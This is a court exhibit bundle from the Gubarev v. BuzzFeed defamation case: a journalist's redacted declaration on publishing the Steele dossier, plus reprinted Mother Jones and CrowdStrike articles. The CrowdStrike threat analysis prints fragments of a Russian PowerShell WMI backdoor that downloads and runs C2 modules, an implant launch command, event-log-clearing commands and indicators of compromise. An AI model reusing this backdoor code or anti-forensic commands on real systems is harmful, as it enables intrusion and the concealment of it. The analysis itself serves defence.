This retreat is dangerous. Instead, we need to develop new rules that adhere to the core values of honesty and respect for our audience. That means debunking falsehoods, and being transparent with readers about our process of reporting. Sometimes, it means publishing unverified information in a transparent way that informs our users of its provenance, its impact and why we trust or distrust it.

Of course, there are lines to be drawn, and we draw them every day. BuzzFeed News receives false tips that lead to dead ends we do not publish. But the Trump dossier was legitimate news: a document that was already influencing decision makers at the very highest levels. In a democracy, the justification for shielding the public from something like that must be overwhelming. The instinct to suppress news of this significance is precisely the wrong one for journalism in 2017.

Ben Smith (@BuzzFeedBen) is the editor in chief of BuzzFeed.

*Follow The New York Times Opinion section on Facebook and Twitter (@NYTopinion), and sign up for the Opinion Today newsletter.*

A version of this article appears in print on Jan. 23, 2017, on Page A23 of the New York edition with the headline: Why BuzzFeed Published the Dossier

READ 432 COMMENTS

# Exhibit 3

**IN THE UNITED STATES DISTRICT COURT
SOUTHERN DISTRICT OF FLORIDA
Case No.: 17-cv-60426-UU**

ALEKSEJ GUBAREV, XBT HOLDING S.A.,
AND WEBZILLA, INC.

    Plaintiffs,

vs.

BUZZFEED, INC. AND BEN SMITH,

    Defendants.

_____/

**DECLARATION OF KEN BENSINGER
IN SUPPORT OF MOTION TO DISMISS**

    I, Ken Bensinger, declare as follows:

    1.    I submit this declaration in support of the motion for summary judgment of Defendants BuzzFeed, Inc. and Ben Smith (the "Defendants"). I am familiar with the facts herein and make this declaration from my own personal knowledge.

**A.    My Background**

    2.    I have been a journalist for more than twenty years. Since 2014, I have been employed as an investigative journalist at BuzzFeed News.

    3.    I have a byline on the story "*These Reports Allege Trump Has Deep Ties To Russia,*" which was published on January 10, 2017 (the "Article"). Embedded in the Article is the 35-page document written by Christopher Steele that has come to be known as the Dossier.

    4.    I graduated from Duke University in 1997, and that same year got my first job in journalism, working first as an intern and then an editorial assistant at Swing magazine for six months.

{01032666;v1}

5.      In 1998, I began working for *The Wall Street Journal,* where I worked in various positions, including as a staff reporter, until I left in 2001.

6.      In 2001, I left the *Journal* to take the Inter-American Press Association Fellowship to live and report in Mexico City.  After the fellowship was over, I stayed in Mexico City and worked there as a freelance reporter for outlets including *Variety* until 2005.

7.      In 2005, I returned to the United States and began working as a writer for *SmartMoney*, a personal finance magazine co-owned by Dow Jones and Hearst.

8.      In 2007, I began working at the *Los Angeles Times,* where I first covered the automotive industry before becoming an investigative reporter.  During that time, I was twice awarded the Gerald Loeb Award for Distinguished Finance & Business Reporting, for coverage of the Toyota sudden acceleration scandal and for a project on predatory subprime used car lending. In 2010, I was a finalist for the Pulitzer Prize in national reporting for the Toyota coverage.

9.      In addition, I am the author of the book, *Red Card: How the U.S. Blew the Whistle on the World's Biggest Sports Scandal*, which was published by Simon & Schuster in 2018.  The book is about the federal criminal investigation into corruption in FIFA, the international governing body for soccer.

**B.      My Efforts To Obtain the Dossier**

10.      On December ▮, 2016, I learned from confidential sources that there were a series of memos that contained information about President-elect Trump's alleged ties with Russia. My sources also told me that the memos were written by Christopher Steele.

11.      I knew of Christopher Steele and his background as a retired MI6 officer, and I knew his reputation as a source for Russian intelligence to be excellent.  I believed and continue

to believe that Mr. Steele has both the types of sources who could provide him with credible information and the expertise to evaluate it.

12.     Although at the time I was on leave working on my book, it seemed to me like a potentially important story. I called my editor, Mark Schoofs, and told him what I had learned. We agreed that the information about the existence of the Steele memos was worth following up and he asked me to try to obtain a copy of the memos.

13.     To try to do so, I reached out several sources I had used in the past but was unable to obtain a copy. ███████ ████████████████████████████████████
████████████████████████████████████████████████████████

14.     Shortly before Christmas, Mr. Schoofs called me and told me that Ben Smith, the editor-in-chief of BuzzFeed News, had been told that a man named ████████ had the Steele memos. ████████████████████████████████████████████████
████████████████████████████████████████████████
████████████████████████████████████████████████
██████████████████████████

15.     ████████████████████████████████████
████████████████████████████████████████████████
████████████████████████████████████████████████
██████████████████████████████████████████████████
████████████████████████████████████████
██████████████████████████████████████
████████████████████████████████████████████████
████████████████████████████████████████████

████████████████████████████████████████████

████████████████████████████████████████████

█████████████████████

16.   ███████████████████████████████████████

████████████████████████████████████████████

█████████████████████████████████████████

████████████████████████████████████████████

██████████████████████████████████████████

17.   ██████████████████████████████████████,

████████████████████████████████████████

████████████ It was apparent to me that ███████████ had substantial concerns that the

President-elect of the United States may have been compromised by the Russian government and

believed this presented a potentially grave threat to the national interests of the United States,

and indeed the West as a whole. ██████████████████████████

███████████████████████████████ Everything about ██████████ demeanor,

expertise, and the substantive things he was saying about Mr. Steele and the memos added to my

belief that the memos were credible and important.

18.   ████████████████████████████████████

████████████████████████████████████████████

████████████████████████████████████████████

██████████████████████████████████████████

████████████████████████████████████████████

████████████████████████████████████████████

███████████████████████████████████████████████████

████████████████████████████████████

19.   ███████████████████████████████████████

███████████████████████████████████████████████████

███████████████████████████████████████████████████

██████████████████████████████████████████████

███████████████████████████████████████████████████

███████████████████████████████████

20.   After I left the meeting ████████████, I sent the Dossier to Mark Schoofs via
WhatsApp, an encrypted messaging application. I then read the Dossier in full, very carefully.  I
found it to be very unsettling, particularly in light of what I had learned about it. I believed that
Mr. Steele likely had good sources for the information contained in the Dossier and the expertise
to credibly assess it. In addition, I believed ██████████ would not have taken it seriously or
shared it to me without good reason.

21.   I also thought that the fact that Senator McCain had personally handed the
Dossier to James Comey was significant. Senator McCain was the Chairman of the Senate
Armed Services Committee and a well-regarded expert in foreign policy. That he gave it to
James Comey indicated to me that he also took it seriously. I also understood that the FBI was, in
fact, investigating the allegations in the Dossier, although I was not aware of the extent or any
outcome of their investigation. I had read an article by David Corn in Mother Jones magazine,
entitled "*A Veteran Spy Has Given the FBI Information Alleging a Russian Operation to
Cultivate Donald Trump*", dated  October 31, 1017,
https://www.motherjones.com/politics/2016/10/veteran-spy-gave-fbi-info-alleging-russian-

operation-cultivate-donald-trump/ , *see* Exhibit A, attached,  which appeared to me to be based

on an interview with Mr. Steele, in which he stated that the memos were in the possession of the

FBI.

22.     In addition, by the time I received the Dossier, there were many reports regarding

Russian efforts to hack the DNC and/or interfere with the election, including a June 15, 2016

report by Crowdstrike entitled "Bears in the Midst: Intrusion into the Democratic National

Committee", that detailed efforts by Russian state actors to hack the Democratic party leadership

*see* Exhibit B, attached, the "Joint Statement from the Department Of Homeland Security and

Office of the Director of National Intelligence on Election Security", dated October 7, 2016, that

confirmed that the Russian government directed the cyberattacks on the Democratic Party

leadership, *see* Exhibit C, attached,   and an article in *The Washington Post* entitled "Secret CIA

assessment says Russia was trying to help Trump win White House," dated December 9, 2016,

that stated that the CIA had confirmed that Russia had tried to help President Trump win the

election *see* Exhibit D, attached.  This was all consistent with the content of the Dossier.

23.     On December ███████████████████ the United States

Department of Homeland Security and the FBI jointly released a report called  "GRIZZLY

STEPPE – Russian Malicious Cyber Activity" that detailed the efforts of Russian State Actors to

interfere in the United States election. *See* Exhibit E, attached.  The same day, President Obama

issued an executive order sanctioning individuals meddling with the Russian election. These

developments confirmed, in broad outlines, the allegations in the Dossier related to Russian

cyber-interference in the election.

24.     It became apparent to me that Mr. Steele had discovered evidence that Russia was engaging in cyber-warfare to try to help elect Donald Trump by the summer of 2016, well before credible evidence of such activity had become available publicly in the United States.

25.     I was also aware of the letter sent by Senator Harry Reid on October 30, 2016, to Director Comey, stating that "In my communications with you and other top officials in the national security community, it has become clear that you possess explosive information about close ties and coordination between Donald Trump, his top advisors, and the Russian government," and urging Director Comey to make that information public. In light of what I had learned about the Dossier, I believed it likely that Reid's letter was referring to the memos.

26.     All of these factors led me to believe, both before and at the time that BuzzFeed published the Dossier, that the allegations contained in it were credible, and indeed were likely substantially true.

27.     I believed that the specific allegations about "Gubarov" and "XBT/Webzilla" in the last memorandum to be credible and likely true. Those allegations filled in specific details about a portion of the Dossier that by that point had been confirmed by both private cyber-security and U.S. Government experts – that Russia had hacked the DNC and other Democratic Party leaders, and was behind the release of their e-mails to Wikileaks. The specific allegations at issue in this case were also just one element of allegations made in several of Mr. Steele's reports about Michael Cohen, then Trump's personal lawyer. Mr. Cohen was well-known as a long-time "fixer" for Mr. Trump, and the actions alleged in the Dossier seemed consistent with that role. Although I was not familiar with "Gubarov" or "XBT/Webzilla", I also thought the very fact that Mr. Steele had identified with that degree of specificity some of the alleged participants in the hacking scheme spoke to the credibility of those particular allegations.  I had

no awareness that the allegations about the Plaintiffs were false or probably false, nor did I have serious doubts about their accuracy.

**C.     Efforts To Investigate Particular Portions of The Dossier**

28.     After I read the Dossier, I called Mark Schoofs and we discussed what I could do to help BuzzFeed's efforts to investigate various aspects of the Dossier. I went back to the sources I had consulted before I obtained the Dossier, but was unable to obtain any additional information about it. I also came to understand that some other news organizations also had a copy of some or all of the memos.

29.     On January 6, 2017, the Intelligence Community jointly released a public version of a report confirming and explaining in more detail that the Russian government was behind efforts to hack e-mails and other forms of cyber-activity to interfere in the election in support of Donald Trump. This reinforced my confidence in the credibility of Mr. Steele's reports.

**D.     Publishing the Article and the Dossier**

30.     On January 7, 2017, I traveled to Florida for a family vacation at Disney World. Late in the afternoon on January 10, I received a call from Mr. Schoofs as I got off a theme park ride with my children. Mr. Schoofs told me that BuzzFeed was preparing to publish the Dossier. I was surprised to hear the news, as I was on vacation and understood that we were still working on reporting on the Dossier. Mr. Schoofs told me he would call me back to discuss further on a conference call.

31.     Mr. Schoofs called me back, with Ben Smith, Shani Hilton, the executive editor of BuzzFeed News, and Miriam Elder, BuzzFeed News's World Editor, also on the line.  At some point, Nabiha Syed, BuzzFeed's lawyer, joined as well. During the call, I was told that

CNN had just reported that President Obama and President-elect Trump had been briefed on the Dossier and the FBI and other law enforcement agencies were continuing to investigate it.

32.     Ben Smith explained his view that now that CNN was reporting that the Dossier was informing decisions at the highest level of government, he believed the Dossier itself was a critical part of the story and should be published.  I recall that Mr. Schoofs, Ms. Hilton and Ms. Elder all supported Mr. Smith's view that the document should be published.

33.     I was surprised to learn that a summary of the Dossier had been briefed to the President and President-elect. That indicated to me that the document was being taken more seriously within the government than I had realized up to that point, which reinforced my confidence in the likely veracity of Steele's reports.

34.     For other reasons, however, I had more concerns about publishing the Dossier than did my colleagues in New York who were on the call. I was concerned that President-elect Trump, who was known to be extremely litigious, might sue us, including me personally. I was also concerned because I wanted to have a chance to inform my sources, including ██████████ that BuzzFeed News was going to publish the Dossier. I asked Mr. Smith if I could have some time to do that before we published the document. Mr. Smith said I could not because he felt time was of the essence given the information CNN had reported. I was disappointed that I did not get to let my sources know that it was going to be published.

35.     I subsequently received a draft of the article to be published with the Dossier and reviewed it on my iPhone. As best I can recall, I made one edit to the draft article, adding the words "potentially unverifiable" to the Article. I did that because I understood that independently verifying some of the allegations, including the alleged video of Donald Trump in a Moscow hotel room, might be very difficult, if not impossible, because it was likely that only the Russian

government itself would possess key evidence if it existed. I felt it was important that readers understand that BuzzFeed News had not independently verified all the information alleged in the Dossier.

36.     Shortly after the story was published, ███████████████████ reached out to me and asked me to get BuzzFeed News to remove the Dossier from the internet. They ████ told me they wanted it taken down because they were afraid for the safety of the sources for the Dossier. I did not understand either to question the *bona fides* of the document; rather they feared for sources' safety. I understood their concerns, which was in part why I had wanted to alert sources first.

37.     While I would have preferred briefly delaying publication to have time to inform sources in advance, I was and remain convinced that publishing the Dossier was the right thing to do. In my view, the article we published explained what the Dossier was and reported that it had been briefed to two presidents, had been handed by the then-director of the FBI by Senator McCain, had been reviewed by Senator Reid, and was thus was informing government decision-making at the highest levels. The Article made clear that it was not purporting to evaluate the truth or falsity of the contents of the Dossier itself.

38.     In the time since we published the Dossier, I have only become more convinced that publishing was the correct decision. I believe it would be impossible to understand what has happened in our nation had the Dossier not been published. The public would not understand President Trump's firing of FBI Director Comey, his anger at federal law enforcement agencies, Carter Page's public statements, or the basis for the report entitled "Foreign Intelligence Surveillance Act Abuses at the Department of Justice and the Federal Bureau of Investigation," issued by Congressman Devin Nunes. Had BuzzFeed not published the Dossier on January 10,

2017, I have no doubt, as an experienced journalist, that it would have inevitably been published at some point shortly thereafter, given the central role it was playing and continues to play in the actions and deliberations of the United States government.

I declare under penalty of perjury that the foregoing is true and correct.

Executed on:  September 2020, 2018

Ken Bensinger

# Exhibit 1
# to Bensinger Declaration

9/18/2018
A Veteran Spy Has Given the FBI Information Alleging a Russian Operation to Cultivate Donald Trump – Mother Jones
Case 0:17-cv-60426-UU Document 287-3 Entered on FLSD Docket 11/03/2018 Page 1 of 54

# MotherJones

# A Veteran Spy Has Given the FBI Information Alleging a Russian Operation to Cultivate Donald Trump

*Has the bureau investigated this material?*

**DAVID CORN**   **OCTOBER 31, 2016 11:52 PM**



**Mike McQuade**

On Friday, FBI Director James Comey set off a political blast when he informed congressional leaders that the bureau had stumbled across emails that might be pertinent to its completed inquiry into Hillary Clinton's handling of emails when she was secretary of state. The Clinton campaign and others criticized Comey for intervening in a presidential campaign by breaking with Justice Department tradition and revealing information about an investigation—information that was vague and perhaps ultimately irrelevant—so close to Election Day. On Sunday, Senate Minority Leader Harry Reid upped the ante. He sent Comey a fiery letter saying the FBI chief may have broken the law and pointed to a potentially greater controversy: "In my communications with you and other top officials in the national security community, it has become clear that you possess explosive information about close ties and coordination between Donald Trump, his top advisors, and the Russian government…The public has a right to know this information."

ADVERTISING

Case 0:17-cv-60426-UU   Document 287-3   Entered on FLSD Docket 11/03/2018   Page 15 of 54

Reid's missive set off a burst of speculation on Twitter and elsewhere. What was he referring to regarding the Republican presidential nominee? At the end of August, Reid had written to Comey and demanded an investigation of the "connections between the Russian government and Donald Trump's presidential campaign," and in that letter he indirectly referred to Carter Page, an American businessman cited by Trump as one of his foreign policy advisers, who had financial ties to Russia and had recently visited Moscow. Last month, *Yahoo News* reported that US intelligence officials were probing the links between Page and senior Russian officials. (Page has called accusations against him "garbage.") On Monday, NBC News reported that the FBI has mounted a preliminary inquiry into the foreign business ties of Paul Manafort, Trump's former campaign chief. But Reid's recent note hinted at more than the Page or Manafort affairs. And a former senior intelligence officer for a Western country who specialized in Russian counterintelligence tells *Mother Jones* that in recent months he provided the bureau with memos, based on his recent interactions with Russian sources, contending the Russian government has for years tried to co-opt and assist Trump—and that the FBI requested more information from him.

**"This is something of huge significance, way above party politics," the former intelligence officer says. "I think [Trump's] own party should be aware of this stuff as well."**

Does this mean the FBI is investigating whether Russian intelligence has attempted to develop a secret relationship with Trump or cultivate him as an asset? Was the former intelligence officer and his material deemed credible or not? An FBI spokeswoman says, "Normally, we don't talk about whether we are investigating anything." But a senior US government official not involved in this case but familiar with the former spy tells *Mother Jones* that he has been a credible source with a proven record of providing reliable, sensitive, and important information to the US government.

In June, the former Western intelligence officer—who spent almost two decades on Russian intelligence matters and who now works with a US firm that gathers information on Russia for corporate clients—was assigned the task of researching Trump's dealings in Russia and elsewhere, according to the former spy and his associates in this American firm. This was for an opposition research project originally financed by a Republican client critical of the celebrity mogul. (Before the former spy was retained, the project's financing switched to a client allied with Democrats.) "It started off as a fairly general inquiry," says the former spook, who asks not to be identified. But when he dug into Trump, he notes, he came across troubling information indicating connections between Trump and the Russian government. According to his sources, he says, "there was an established exchange of information between the Trump campaign and the Kremlin of mutual benefit."

This was, the former spy remarks, "an extraordinary situation." He regularly consults with US government agencies on Russian matters, and near the start of July on his own initiative—without the permission of the US company that hired him—he sent a report he had written for that firm to a contact at the FBI, according to the former intelligence officer and

his American associates, who asked not to be identified. (He declines to identify the FBI contact.) The former spy says he concluded that the information he had collected on Trump was "sufficiently serious" to share with the FBI.

*Mother Jones* has reviewed that report and other memos this former spy wrote. The first memo, based on the former intelligence officer's conversations with Russian sources, noted, "Russian regime has been cultivating, supporting and assisting TRUMP for at least 5 years. Aim, endorsed by PUTIN, has been to encourage splits and divisions in western alliance." It maintained that Trump "and his inner circle have accepted a regular flow of intelligence from the Kremlin, including on his Democratic and other political rivals." It claimed that Russian intelligence had "compromised" Trump during his visits to Moscow and could "blackmail him." It also reported that Russian intelligence had compiled a dossier on Hillary Clinton based on "bugged conversations she had on various visits to Russia and intercepted phone calls."

The former intelligence officer says the response from the FBI was "shock and horror." The FBI, after receiving the first memo, did not immediately request additional material, according to the former intelligence officer and his American associates. Yet in August, they say, the FBI asked him for all information in his possession and for him to explain how the material had been gathered and to identify his sources. The former spy forwarded to the bureau several memos—some of which referred to members of Trump's inner circle. After that point, he continued to share information with the FBI. "It's quite clear there was or is a pretty substantial inquiry going on," he says.

"This is something of huge significance, way above party politics," the former intelligence officer comments. "I think [Trump's] own party should be aware of this stuff as well."

The Trump campaign did not respond to a request for comment regarding the memos. In the past, Trump has declared, "I have nothing to do with Russia."

The FBI is certainly investigating the hacks attributed to Russia that have hit American political targets, including the Democratic National Committee and John Podesta, the chairman of Clinton's presidential campaign. But there have been few public signs of whether that probe extends to examining possible contacts between the Russian government and Trump. (In recent weeks, reporters in Washington have pursued anonymous online reports that a computer server related to the Trump Organization engaged in a high level of activity with servers connected to Alfa Bank, the largest private bank in Russia. On Monday, a *Slate* investigation detailed the pattern of unusual server activity but concluded, "We don't yet know what this [Trump] server was for, but it deserves further explanation." In an email to *Mother Jones*, Hope Hicks, a Trump campaign spokeswoman, maintains, "The Trump Organization is not sending or receiving any communications from this email server. The Trump Organization has no communication or relationship with this entity or any Russian entity.")

According to several national security experts, there is widespread concern in the US intelligence community that Russian intelligence, via hacks, is aiming to undermine the presidential election—to embarrass the United States and delegitimize its democratic elections. And the hacks appear to have been designed to benefit Trump. In August, Democratic members of the House committee on oversight wrote Comey to ask the FBI to investigate "whether connections between Trump campaign officials and Russian interests may have contributed to these [cyber] attacks in order to interfere with the US. presidential election." In September, Sen. Dianne Feinstein and Rep. Adam Schiff, the senior Democrats on, respectively, the Senate and House intelligence committees, issued a joint statement accusing Russia of underhanded meddling: "Based on briefings we have received, we have concluded that the Russian intelligence agencies are making a serious and concerted effort to influence the U.S. election. At the least, this effort is intended to sow doubt about the security of our election and may well be intended to influence the outcomes of the election." The Obama White House has declared Russia the culprit in the hacking capers, expressed outrage, and promised a "proportional" response.

Case 0:17-cv-60426-UU   Document 287-3   Entered on FLSD Docket 11/03/2018   Page 1 of 54

There's no way to tell whether the FBI has confirmed or debunked any of the allegations contained in the former spy's memos. But a Russian intelligence attempt to co-opt or cultivate a presidential candidate would mark an even more serious operation than the hacking.

In the letter Reid sent to Comey on Sunday, he pointed out that months ago he had asked the FBI director to release information on Trump's possible Russia ties. Since then, according to a Reid spokesman, Reid has been briefed several times. The spokesman adds, "He is confident that he knows enough to be extremely alarmed."

**DAVID CORN** 🐦

David Corn is *Mother Jones'* Washington bureau chief and an on-air analyst for MSNBC. He is the co-author (with Michael Isikoff) of *Russian Roulette: The Inside Story of Putin's War on America and the Election of Donald Trump*. He is the author of three New York Times bestsellers, *Showdown*, *Hubris* (with Isikoff), and *The Lies of George W. Bush*, as well as the e-book, 47 Percent: Uncovering the Romney Video that Rocked the 2012 Election. For more of his stories, click here. He's also on Twitter and Facebook.

---

Copyright © 2018 Mother Jones and the Foundation for National Progress. All Rights Reserved.

# Exhibit 2
# to Bensinger Declaration

 | **BLOG**

# Bears in the Midst: Intrusion into the Democratic National Committee

June 15, 2016     Dmitri Alperovitch     From The Front Lines



*Follow @CrowdStrike and @DAlperovitch for the latest on these threats*

*UPDATE:*

Below are some additional links to independent articles that have been published since our original blog:

- Daily Beast, July 16, 2018 : "Trump's 'Missing DNC Server' Is Neither Missing Nor a Server"
- Daily Beast, June 13, 2018: "Mueller Indicts 12 Russian Officers for Hacking Dems in 2016"
- U.S. Department of Justice Indictment, June 13, 2018: "Case 1:18-cr-00215-ABJ"
- ArsTechnica, March 23, 2018: "DNC "lone hacker" Guccifer 2.0 pegged as Russian spy after opsec fail"

Access our most popular resources

| 2018 CrowdStrike Global Threat Report | Falcon Prevent Next-Gen Antivirus Free Trial | 2018 G Quadr Protec |
| --- | --- | --- |

- AP, November 2, 2017: "Russia hackers pursued Putin foes, not just US Democrats"
- The Hill, August 14, 2017: "Why the latest theory about the DNC not being hacked is probably wrong"
- Daily Beast, July 20, 2017: "Putin's Hackers Now Under Attack—From Microsoft"
- Washington Post, July 6, 2017: "Here's the public evidence that supports the idea that Russia interfered in the 2016 election"
- Senate testimony of Thomas Rid, March 30, 2017
- Senate testimony of Kevin Mandia, March 30, 2017
- Wired Magazine, March 5, 2017: "Hunting the DNC hackers: how Crowdstrike found proof Russia hacked the Democrats"
- New York Times, Jan. 6, 2017: "Intelligence Report on Russian Hacking" (includes full copy of the official U.S. Intelligence and Law Enforcement Agency report):
- New York Times, Dec. 13, 2016: "The Perfect Weapon: How Russian Cyberpower Invaded the U.S."
- Washington Post, June 20, 2016: "Cyber researchers confirm Russian government hack of Democratic National Committee"
- ThreatConnect Blog, June 17, 2016: "Rebooting Watergate: Tapping into the Democratic National Committee"
- SecureWorks Blog, June 16, 2016: "Russian Threat Group Targets Clinton Campaign"

---

*June 15, 2016 UPDATE:*

CrowdStrike stands fully by its analysis and findings identifying two separate Russian intelligence-affiliated adversaries present in the DNC network in May 2016. On June 15, 2016 a blog post to a WordPress site authored by an individual using the moniker Guccifer 2.0 claimed credit for breaching the Democratic National Committee. This blog post presents documents alleged to have originated from the DNC.

Whether or not this posting is part of a Russian Intelligence disinformation campaign, we are exploring the documents' authenticity and origin. Regardless, these claims do nothing to lessen

Access our most popular resources

There is rarely a dull day at CrowdStrike where we are not detecting or responding to a breach at a company somewhere around the globe. In all of these cases, we operate under strict confidentiality rules with our customers and cannot reveal publicly any information about these attacks. But on rare occasions, a customer decides to go public with information about their incident and give us permission to share our knowledge of the adversary tradecraft with the broader community and help protect even those who do not happen to be our customers. This story is about one of those cases.

CrowdStrike Services Inc., our Incident Response group, was called by the Democratic National Committee (DNC), the formal governing body for the US Democratic Party, to respond to a suspected breach. We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network – COZY BEAR and FANCY BEAR. We've had lots of experience with both of these actors attempting to target our customers in the past and know them well. In fact, our team considers them some of the best adversaries out of all the numerous nation-state, criminal and hacktivist/terrorist groups we encounter on a daily basis. Their tradecraft is superb, operational security second to none and the extensive usage of 'living-off-the-land' techniques enables them to easily bypass many security solutions they encounter. In particular, we identified advanced methods consistent with nation-state level capabilities including deliberate targeting and 'access management' tradecraft – both groups were constantly going back into the environment to change out their implants, modify persistent methods, move to new Command & Control channels and perform other tasks to try to stay ahead of being detected. Both adversaries engage in extensive political and economic espionage for the benefit of the government of the Russian Federation and are believed to be closely linked to the Russian government's powerful and highly capable intelligence services.

COZY BEAR (also referred to in some industry reports as CozyDuke or APT 29) is the adversary group that last year successfully infiltrated the unclassified networks of the White House, State Department, and US

Access our most popular resources    ^

Asian countries. COZY BEAR's preferred intrusion method is a broadly targeted spearphish campaign that typically includes web links to a malicious dropper. Once executed on the machine, the code will deliver one of a number of sophisticated Remote Access Tools (RATs), including AdobeARM, ATI-Agent, and MiniDionis. On many occasions, both the dropper and the payload will contain a range of techniques to ensure the sample is not being analyzed on a virtual machine, using a debugger, or located within a sandbox. They have extensive checks for the various security software that is installed on the system and their specific configurations. When specific versions are discovered that may cause issues for the RAT, it promptly exits. These actions demonstrate a well-resourced adversary with a thorough implant-testing regime that is highly attuned to slight configuration issues that may result in their detection, and which would cause them to deploy a different tool instead. The implants are highly configurable via encrypted configuration files, which allow the adversary to customize various components, including C2 servers, the list of initial tasks to carry out, persistence mechanisms, encryption keys and others. An HTTP protocol with encrypted payload is used for the Command & Control communication.

FANCY BEAR (also known as Sofacy or APT 28) is a separate Russian-based threat actor, which has been active since mid 2000s, and has been responsible for targeted intrusion campaigns against the Aerospace, Defense, Energy, Government and Media sectors. Their victims have been identified in the United States, Western Europe, Brazil, Canada, China, Georgia, Iran, Japan, Malaysia and South Korea. Extensive targeting of defense ministries and other military victims has been observed, the profile of which closely mirrors the strategic interests of the Russian government, and may indicate affiliation with Главное Разведывательное Управление (Main Intelligence Department) or GRU, Russia's premier military intelligence service. This adversary has a wide range of implants at their disposal, which have been developed over the course of many years and include Sofacy, X-Agent, X-Tunnel, WinIDS, Foozer and DownRange droppers, and even malware for Linux, OSX, IOS, Android and Windows Phones. This group is known for its technique of registering domains that closely resemble domains of

Access our most popular resources

At DNC, COZY BEAR intrusion has been identified going back to summer
of 2015, while FANCY BEAR separately breached the network in April
2016. We have identified no collaboration between the two actors, or
even an awareness of one by the other.  Instead, we observed the two
Russian espionage groups compromise the same systems and engage
separately in the theft of identical credentials. While you would virtually
never see Western intelligence agencies going after the same target
without de-confliction for fear of compromising each other's
operations, in Russia this is not an uncommon scenario. "Putin's
Hydra: Inside Russia's Intelligence Services", a recent paper from
European Council on Foreign Relations, does an excellent job outlining
the highly adversarial relationship between Russia's main intelligence
services – Федеральная Служба Безопасности (FSB), the primary
domestic intelligence agency but one with also significant external
collection and 'active measures' remit, Служба Внешней Разведки (SVR),
the primary foreign intelligence agency, and the aforementioned GRU.
Not only do they have overlapping areas of responsibility, but also
rarely share intelligence and even occasionally steal sources from each
other and compromise operations. Thus, it is not surprising to see
them engage in intrusions against the same victim, even when it may
be a waste of resources and lead to the discovery and potential
compromise of mutual operations.

The COZY BEAR intrusion relied primarily on the SeaDaddy implant
developed in Python and compiled with py2exe and another Powershell
backdoor with persistence accomplished via Windows Management
Instrumentation (WMI) system, which allowed the adversary to launch
malicious code automatically after a specified period of system uptime
or on a specific schedule. The Powershell backdoor is ingenious in its
simplicity and power. It consists of a single obfuscated command
setup to run persistently, such as:

```
powershell.exe -NonInteractive -ExecutionPolicy Bypass
-EncodedCommand
ZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHI
```

Access our most popular resources

```
try{
$ms = New-Object System.IO.MemoryStream
$cs = New-Object
System.Security.Cryptography.CryptoStream -
ArgumentList @($ms, $crTr,
[System.Security.Cryptography.CryptoStreamMode]::Write)
$cs.Write($data, 0, $data.Length)
$cs.FlushFinalBlock()
$ret = $ms.ToArray()
$cs.Close()
$ms.Close()
}
catch{}
return $ret
}
function decrAes($encData, $key, $iv)
{
$ret = $null
try{
$prov = New-Object
System.Security.Cryptography.RijndaelManaged
$prov.Key = $key
$prov.IV = $iv
$decr = $prov.CreateDecryptor($prov.Key, $prov.IV)
$ret = perfCr $decr $encData
}
Catch{}
return $ret
}
function sWP($cN, $pN, $aK, $aI)
{
if($cN -eq $null -or $pN -eq $null){return $false}
try{
$wp = ([wmiclass]$cN).Properties[$pN].Value
$exEn = [Convert]::FromBase64String($wp)
$exDec = decrAes $exEn $aK $aI
$ex = [Text.Encoding]::UTF8.GetString($exDec)
```

Access our most popular resources                                    ^

```
catch{
return $false
}
}
$aeK = [byte[]] (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6,
0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc,
0x3f, 0x22, 0xed, 0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0,
0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00)
$aeI = [byte[]] (0xbe, 0x7a, 0x90, 0xd9, 0xd5, 0xf7,
0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0,
0x67)
sWP 'Wmi' 'Wmi' $aeK $aeI | Out-Null
```

This one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads additional powershell modules from it, executing them in memory. In theory, the additional modules can do virtually anything on the victim system. The encryption keys in the script were different on every system. Powershell version of credential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes.

FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as:

```
rundll32.exe "C:\Windows\twain_64.dll"
```

In addition, FANCY BEAR's X-Tunnel network tunneling tool, which facilitates connections to NAT-ed environments, was used to also execute remote commands. Both tools were deployed via RemCOM, an open-source replacement for PsExec available from GitHub. They also engaged in a number of anti-forensic analysis measures, such as periodic event log clearing (via `wevtutil cl System` and `wevtutil cl Security` commands) and resetting timestamps of files.

Intelligence collection directed by nation state actors against US

Access our most popular resources    ˄

attention, and leaders of other states are anxiously watching and
planning for possible outcomes. Attacks against electoral candidates
and the parties they represent are likely to continue up until the
election in November.

Indicators of Compromise:

| IOC | Adversary | IOC Type | Additiona |
|---|---|---|---|
| 6c1bce76f4d2358656132b6b1d471571820688ccdbaca0d86d0ca082b9390536 | COZY BEAR | SHA256 | pagemgr. (SeaDado |
| b101cd29e18a515753409ae86ce68a4cedbe0d640d385eb24b9bbb69cf8186ae | COZY BEAR | SHA256 | pagemgr. (SeaDado |
| 185[.]100[.]84[.]134:443 | COZY BEAR | C2 | SeaDaddy |
| 58[.]49[.]58[.]58:443 | COZY BEAR | C2 | SeaDaddy |
| 218[.]1[.]98[.]203:80 | COZY BEAR | C2 | Powershe C2 |
| 187[.]33[.]33[.]8:80 | COZY BEAR | C2 | Powershe C2 |
| fd39d2837b30e7233bc54598ff51bdc2f8c418fa5b94dea2cadb24cf40f395e5 | FANCY BEAR | SHA256 | twain_64 (64-bit X- implant) |
| 4845761c9bed0563d0aa83613311191e075a9b58861e80392914d61a21bad976 | FANCY BEAR | SHA256 | VmUpgra (X-Tunne |
| 40ae43b7d6c413becc92b07076fa128b875c8dbb4da7c036639eccf5a9fc784f | FANCY BEAR | SHA256 | VmUpgra (X-Tunne |

Access our most popular resources                                    ^

| | | BEAR | | |
|---|---|---|---|---|
| 23[.]227[.]196[.]217:443 | | FANCY BEAR | C2 | X-Tunnel |





## Dmitri Alperovitch

